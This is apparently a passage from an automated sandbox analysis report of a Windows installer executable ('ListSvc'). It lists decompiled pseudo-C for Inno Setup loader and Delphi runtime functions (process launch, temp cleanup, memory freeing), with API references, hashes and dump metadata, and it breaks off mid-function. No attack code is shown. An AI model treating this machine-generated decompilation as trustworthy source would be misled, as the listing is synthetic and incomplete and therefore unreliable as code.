				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
				_push( *((intOrPtr*)(_t73 - 0x40)));
				_push( *0x4c1d84);
				_push(0x4b6680);
				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
				_push( *((intOrPtr*)(_t73 - 0x5c)));
				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
				_t36 =  *0x4c1d9c; // 0x0, executed
				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
				if( *0x4ba448 != 0xffffffff) {
					_t50 =  *0x4ba448; // 0x0
					E004AF60C(_t50);
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E004B6554);
				_t39 =  *0x4c1d88; // 0x0
				_t40 = E00405CE8(_t39);
				if( *0x4c1d9c != 0) {
					_t70 =  *0x4c1d9c; // 0x0
					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
				}
				if( *0x4c1d94 != 0) {
					_t47 =  *0x4c1d94; // 0x0
					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
				}
				if( *0x4ba450 != 0) {
					_t46 =  *0x4ba450; // 0x6001e
					_t40 = DestroyWindow(_t46); // executed
				}
				if( *0x4c1d78 != 0) {
					_t41 =  *0x4c1d78; // 0x0
					_t60 =  *0x4c1d7c; // 0x1
					_t69 =  *0x426bb0; // 0x426bb4
					E00408D08(_t41, _t60, _t69);
					_t43 =  *0x4c1d78; // 0x0
					E0040540C(_t43);
					 *0x4c1d78 = 0;
					return 0;
				}
				return _t40;
			}

0x004b63a1
0x004b63a1
0x004b63a1
0x004b63a1
0x004b63a3
0x004b63a6
0x004b63d3
0x004b63da
0x004b63e0
0x004b6407
0x004b640c
0x004b6418
0x004b6423
0x004b642c
0x004b6431
0x004b6434
0x004b6438
0x004b643d
0x004b6440
0x004b6443
0x004b6447
0x004b644c
0x004b644f
0x004b6452
0x004b6463
0x004b6468
0x004b646b
0x004b6471
0x004b6479
0x004b647e
0x004b6489
0x004b6496
0x004b649b
0x004b64a7
0x004b64a9
0x004b64ae
0x004b64ae
0x004b64b5
0x004b64b8
0x004b64bb
0x004b64c0
0x004b64c5
0x004b64d1
0x004b64df
0x004b64e7
0x004b64e7
0x004b64f3
0x004b64f5
0x004b6500
0x004b6500
0x004b650c
0x004b650e
0x004b6514
0x004b6514
0x004b6520
0x004b6522
0x004b6527
0x004b652d
0x004b6533
0x004b6538
0x004b653d
0x004b6544
0x00000000
0x004b6544
0x004b6549

APIs

Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F

SetWindowLongW.USER32 ref: 004B641E

Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA

Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4

RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
DestroyWindow.USER32(0006001E,004B6554), ref: 004B6514

Strings

InnoSetupLdrWindow, xrefs: 004B63FB
/SL5="$%x,%d,%d,, xrefs: 004B645E
(HM, xrefs: 004B6438, 004B6447
STATIC, xrefs: 004B6400

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: (HM$/SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 3586484885-3576244072
Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040426C, Relevance: 12.2, APIs: 8, Instructions: 221
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E0040426C(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				int _t65;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x4bb059; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00403C48();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
								if(_t65 == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x4bdb78 = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x4bb989;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x4bb059; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x4bbaf0 - 0x13ffe0;
							if( *0x4bbaf0 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E00403B60(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x4bbaf0 = 0x13ffe0;
								 *0x4bbaec = _t82;
								 *0x4bbae8 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x4bbae8 = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E00403B00(_t106, _t88, _t81);
							 *0x4bbae8 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}

0x0040426c
0x0040426c
0x00404275
0x0040427b
0x00404364
0x00404367
0x00404454
0x00404455
0x00404458
0x00403cf8
0x00403cfa
0x00403cfc
0x00403d01
0x00403d04
0x00403d09
0x00403d0d
0x00403d13
0x00403d17
0x00403d1d
0x00403d39
0x00403d3d
0x00403d40
0x00403d40
0x00403d42
0x00403d4a
0x00403d57
0x00403d5c
0x00403d5e
0x00403d60
0x00403d63
0x00403d63
0x00403d65
0x00403d69
0x00403d6b
0x00403d6d
0x00403d6f
0x00000000
0x00403d6f
0x00000000
0x00403d6b
0x00403d1f
0x00403d27
0x00403d2e
0x00403d34
0x00403d30
0x00403d30
0x00403d30
0x00403d2e
0x00403d73
0x00403d75
0x00403d7e
0x00403d87
0x00403d87
0x00403d8a
0x00403d9a
0x0040445e
0x00404463
0x00404463
0x00000000
0x00000000
0x00000000
0x00404281
0x00404281
0x00404283
0x00404285
0x004042e8
0x004042e8
0x004042ed
0x004042f1
0x00000000
0x00000000
0x004042f3
0x004042f5
0x004042fc
0x00000000
0x004042fe
0x00404302
0x00404307
0x00404308
0x00404309
0x0040430e
0x00404312
0x0040431c
0x00404321
0x00404322
0x00000000
0x00404322
0x00404312
0x00000000
0x004042fc
0x004042e8
0x00404287
0x00404287
0x00404287
0x00404287
0x0040428b
0x0040428e
0x004042bc
0x004042be
0x004042d3
0x004042d3
0x004042c0
0x004042c0
0x004042c3
0x004042c6
0x004042c9
0x004042cc
0x004042ce
0x004042d1
0x00000000
0x00000000
0x004042d1
0x004042d6
0x004042d8
0x004042da
0x004042dd
0x0040436d
0x00404370
0x00404372
0x00404374
0x00404375
0x00404377
0x00404328
0x00404328
0x0040432d
0x00404335
0x00000000
0x00000000
0x00404337
0x00404339
0x00404340
0x00000000
0x00404342
0x00404344
0x00404349
0x0040434e
0x00404356
0x0040435a
0x00000000
0x0040435a
0x00404356
0x00000000
0x00404340
0x00404328
0x00404379
0x00404379
0x00404381
0x00404385
0x004043bc
0x004043bf
0x004043c2
0x004043c4
0x004043ca
0x004043cc
0x004043cc
0x00404387
0x00404387
0x00404387
0x0040438a
0x0040438a
0x0040438e
0x00404392
0x004043d4
0x004043d7
0x004043d9
0x004043db
0x004043e1
0x004043e5
0x004043e5
0x004043e1
0x00404394
0x0040439a
0x004043ec
0x004043f6
0x00404424
0x0040442a
0x0040442f
0x00404436
0x00404440
0x00404446
0x0040444d
0x00404451
0x004043f8
0x004043f8
0x004043fb
0x004043fd
0x00404400
0x00404403
0x00404405
0x00404414
0x00404419
0x0040441c
0x00404420
0x00404420
0x0040439c
0x0040439f
0x004043a2
0x004043aa
0x004043af
0x004043b6
0x004043ba
0x004043ba
0x00404290
0x00404290
0x00404292
0x00404298
0x0040429b
0x004042a4
0x004042a7
0x004042aa
0x004042ad
0x004042b0
0x004042b3
0x004042b6
0x004042b6
0x004042b8
0x004042b9
0x0040429d
0x0040429d
0x0040429d
0x0040429f
0x004042a1
0x004042a2
0x004042a2
0x0040429b
0x0040428e

APIs

Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789

Uniqueness

Uniqueness Score: -1.00%

Function 004B60E8, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 165
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t26;
				intOrPtr _t31;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t61;
				WCHAR* _t63;
				intOrPtr _t69;
				intOrPtr _t74;
				int _t75;
				intOrPtr _t76;
				intOrPtr _t78;
				struct HWND__* _t81;
				intOrPtr _t82;
				intOrPtr _t86;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t120;
				intOrPtr _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t85 = __ebx;
				_pop(_t101);
				_pop(_t88);
				 *[fs:eax] = _t101;
				E004AF678(_t88);
				if( *0x4ba440 == 0) {
					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
						_t61 =  *0x4ba674; // 0x4c0d0c
						_t4 = _t61 + 0x2f8; // 0x0
						_t63 = E004084EC( *_t4);
						_t88 = _t120 - 0x28;
						_t101 =  *0x4c1c48; // 0x0
						E00426F08(0xc2, _t120 - 0x28, _t101);
						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
							 *0x4ba44c = 2;
							E0041F238();
						}
					}
					E004056D0();
					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
					_t26 =  *0x4c1d84; // 0x0
					E00422954(_t26, _t88, _t120 - 0x34);
					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
					_push( *((intOrPtr*)(_t120 - 0x30)));
					_t31 =  *0x4c1d94; // 0x0
					E00422660(_t31, _t120 - 0x38);
					_pop(_t90);
					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
					_t107 =  *0x4c1d98; // 0x0
					E00407E00(0x4c1d9c, _t107);
					_t37 =  *0x4c1d90; // 0x4d4828
					_t15 = _t37 + 0x14; // 0x16b0bd
					_t38 =  *0x4c1d88; // 0x0
					E00423CE8(_t38,  *_t15);
					_push(_t120);
					_push(0x4b63ab);
					_push( *[fs:edx]);
					 *[fs:edx] = _t121;
					 *0x4c1de0 = 0;
					_t42 = E00423D00(1, 0, 1, 0); // executed
					 *0x4c1d8c = _t42;
					_push(_t120);
					_push(0x4b639a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t44 =  *0x4c1d90; // 0x4d4828
					_t16 = _t44 + 0x18; // 0x301c00
					 *0x4c1de0 = E004053F0( *_t16);
					_t47 =  *0x4c1d90; // 0x4d4828
					_t17 = _t47 + 0x18; // 0x301c00
					_t86 =  *0x4c1de0; // 0x7fba0010
					E00405884(_t86,  *_t17);
					_push(_t120);
					_push(0x4b62e9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t51 =  *0x424cd8; // 0x424d30
					_t93 =  *0x4c1d88; // 0x0
					_t53 = E00424748(_t93, 1, _t51); // executed
					 *0x4c1de4 = _t53;
					_push(_t120);
					_push(0x4b62d8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t55 =  *0x4c1d90; // 0x4d4828
					_t18 = _t55 + 0x18; // 0x301c00
					_t56 =  *0x4c1de4; // 0x220ab00
					E00424A24(_t56,  *_t18, _t86);
					_pop(_t114);
					 *[fs:eax] = _t114;
					_push(E004B62DF);
					_t59 =  *0x4c1de4; // 0x220ab00
					return E00405CE8(_t59);
				} else {
					_t69 =  *0x4ba674; // 0x4c0d0c
					_t1 = _t69 + 0x1d0; // 0x0
					E004AFA44( *_t1, __ebx, __edi, __esi);
					 *0x4ba44c = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E004B6554);
					_t74 =  *0x4c1d88; // 0x0
					_t75 = E00405CE8(_t74);
					if( *0x4c1d9c != 0) {
						_t117 =  *0x4c1d9c; // 0x0
						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
					}
					if( *0x4c1d94 != 0) {
						_t82 =  *0x4c1d94; // 0x0
						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
					}
					if( *0x4ba450 != 0) {
						_t81 =  *0x4ba450; // 0x6001e
						_t75 = DestroyWindow(_t81); // executed
					}
					if( *0x4c1d78 != 0) {
						_t76 =  *0x4c1d78; // 0x0
						_t99 =  *0x4c1d7c; // 0x1
						_t116 =  *0x426bb0; // 0x426bb4
						E00408D08(_t76, _t99, _t116);
						_t78 =  *0x4c1d78; // 0x0
						E0040540C(_t78);
						 *0x4c1d78 = 0;
						return 0;
					}
					return _t75;
				}
			}

0x004b60e8
0x004b60e8
0x004b60e8
0x004b60ea
0x004b60ec
0x004b60ed
0x004b610d
0x004b6119
0x004b613e
0x004b614b
0x004b6150
0x004b6156
0x004b615c
0x004b615f
0x004b6169
0x004b6181
0x004b6183
0x004b618d
0x004b618d
0x004b6181
0x004b6192
0x004b619a
0x004b61a7
0x004b61af
0x004b61b4
0x004b61c4
0x004b61cc
0x004b61d0
0x004b61d5
0x004b61e2
0x004b61e3
0x004b61ed
0x004b61f3
0x004b61f8
0x004b61fd
0x004b6200
0x004b6205
0x004b620c
0x004b620d
0x004b6212
0x004b6215
0x004b621a
0x004b6232
0x004b6237
0x004b623e
0x004b623f
0x004b6244
0x004b6247
0x004b624a
0x004b624f
0x004b6257
0x004b625c
0x004b6261
0x004b6264
0x004b626e
0x004b6275
0x004b6276
0x004b627b
0x004b627e
0x004b6281
0x004b6287
0x004b6294
0x004b6299
0x004b62a0
0x004b62a1
0x004b62a6
0x004b62a9
0x004b62ac
0x004b62b1
0x004b62b6
0x004b62bb
0x004b62c2
0x004b62c5
0x004b62c8
0x004b62cd
0x004b62d7
0x004b611b
0x004b611b
0x004b6120
0x004b6126
0x004b612d
0x004b64b5
0x004b64b8
0x004b64bb
0x004b64c0
0x004b64c5
0x004b64d1
0x004b64df
0x004b64e7
0x004b64e7
0x004b64f3
0x004b64f5
0x004b6500
0x004b6500
0x004b650c
0x004b650e
0x004b6514
0x004b6514
0x004b6520
0x004b6522
0x004b6527
0x004b652d
0x004b6533
0x004b6538
0x004b653d
0x004b6544
0x00000000
0x004b6544
0x004b6549
0x004b6549

APIs

MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179

Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE

RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
DestroyWindow.USER32(0006001E,004B6554), ref: 004B6514

Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200

Strings

(HM, xrefs: 004B61F8, 004B624A, 004B625C, 004B62AC
0MB, xrefs: 004B6281
.tmp, xrefs: 004B61BF

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
String ID: (HM$.tmp$0MB
API String ID: 3858953238-3529996390
Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004AF728, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				void* _v88;
				void* _v92;
				int _t23;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x4af7ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x4af81c);
				_push(__eax);
				_push(0x4af82c);
				_push(__edx);
				E004087C4( &_v8, __eax, 4, __ecx, __edx);
				E00405884( &_v76, 0x44);
				_v76.cb = 0x44;
				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t58 = _t23;
				if(_t23 == 0) {
					E004AF34C(0x83, _t41, 0, _t53, _t58);
				}
				CloseHandle(_v88);
				do {
					E004AF6FC();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
				E004AF6FC();
				GetExitCodeProcess(_v92, _t51); // executed
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x4af806);
				return E00407A20( &_v8);
			}

0x004af733
0x004af736
0x004af738
0x004af73a
0x004af73e
0x004af73f
0x004af744
0x004af747
0x004af74a
0x004af74f
0x004af750
0x004af755
0x004af75e
0x004af76d
0x004af772
0x004af798
0x004af79d
0x004af79f
0x004af7a5
0x004af7a5
0x004af7ae
0x004af7b3
0x004af7b3
0x004af7cc
0x004af7d1
0x004af7db
0x004af7e4
0x004af7eb
0x004af7ee
0x004af7f1
0x004af7fe

APIs

CreateProcessW.KERNEL32 ref: 004AF798
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
GetExitCodeProcess.KERNEL32 ref: 004AF7DB
CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4

Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F

Strings

D, xrefs: 004AF772

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
String ID: D
API String ID: 3356880605-2746444292
Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D

Uniqueness

Uniqueness Score: -1.00%

Function 004B5A90, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _t16;
				intOrPtr _t32;
				intOrPtr _t41;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t41);
				_push(0x4b5b5a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				 *0x4c1124 =  *0x4c1124 - 1;
				if( *0x4c1124 < 0) {
					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
						_t16 = 0;
					} else {
						_t16 = 1;
					}
					 *0x4c1130 = _t16;
					E00422D44( &_v12);
